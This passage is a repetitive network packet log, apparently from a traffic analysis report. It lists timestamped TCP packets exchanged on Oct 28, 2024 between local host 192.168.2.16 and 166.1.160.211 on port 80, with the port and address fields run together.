                                                                                                                                                              Oct 28, 2024 19:46:24.285118103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285151958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285172939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285191059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285228014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285233974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285312891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285346985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285355091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285384893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285418987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285429001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285897970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285944939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285950899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285986900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286022902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286034107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286056042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286112070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286168098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286201954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286236048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286245108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286271095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286313057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286322117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286355972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286390066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286397934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286930084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286963940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286976099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287017107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287050962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287061930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287086010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287128925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287137032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287173033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287216902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287224054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287260056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287293911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287305117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287345886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287379980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287388086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287750959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287801981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287810087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287846088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287880898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287890911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288285017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288319111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288330078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288353920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288398981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288404942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288439989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288481951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288490057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288526058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288558960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288568974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288594961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288629055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288639069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288666010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288701057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288708925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289067030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289114952 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289118052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289153099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289196968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289218903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289253950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289289951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289298058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289324999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289361000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289366961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289414883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289454937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289462090 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289489985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289524078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289534092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290050983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290103912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290116072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290139914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290184975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290297985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290350914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290384054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290395975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290436983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290472031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290482044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290508032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290540934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290550947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290575981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474498034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474548101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474551916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474586964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474622011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474637032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474673986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474709034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474721909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474742889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474777937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474793911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474828959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474857092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474872112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474873066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474889994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474909067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474914074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474925995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474942923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474948883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474960089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474976063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474987030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474993944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475009918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475018978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.475025892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475043058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475052118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.475059986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475075960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475083113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.475094080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475122929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.515250921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.533421993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.539135933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701092958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701134920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701188087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701189995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701224089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701258898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701289892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701292992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701342106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701344013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701386929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701438904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701438904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701488018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701533079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701539040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701574087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701607943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701620102 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701642990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701677084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701687098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701711893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701757908 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701764107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701798916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701836109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701842070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701889992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701925039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701948881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701976061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702022076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702253103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702306986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702342033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702370882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702445030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702478886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702488899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702512026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702545881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702558041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702579975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702622890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702877045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702972889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703023911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703030109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.703073025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703108072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703125954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.703142881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703186989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.703572035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703603029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703656912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.768891096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.768934965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.768969059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769072056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769123077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769140005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769156933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769170046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769191027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769197941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769243002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769278049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769284010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769311905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769346952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769352913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769380093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769418955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769432068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769467115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769510984 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769517899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769552946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769587040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769598961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769623041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769656897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769668102 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.859658957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859674931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.863080025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887217045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887262106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887330055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887366056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887398958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887406111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887406111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887432098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887450933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887499094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887547016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887550116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887583971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887631893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887676954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887727976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887761116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887779951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887851000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887903929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887937069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888006926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888041019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888058901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888104916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888137102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888158083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888194084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888238907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888505936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888557911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888592958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888605118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888644934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888678074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888694048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888720036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888768911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888864994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888947010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888979912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888991117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889044046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889079094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889096022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889111996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889146090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889163017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889178038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889220953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889429092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889482975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889514923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889527082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889648914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889682055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889692068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889765024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889796972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889811039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889830112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889864922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889878988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889899015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889934063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889942884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889966965 CET8049726166.1.160.211192.168.2.16
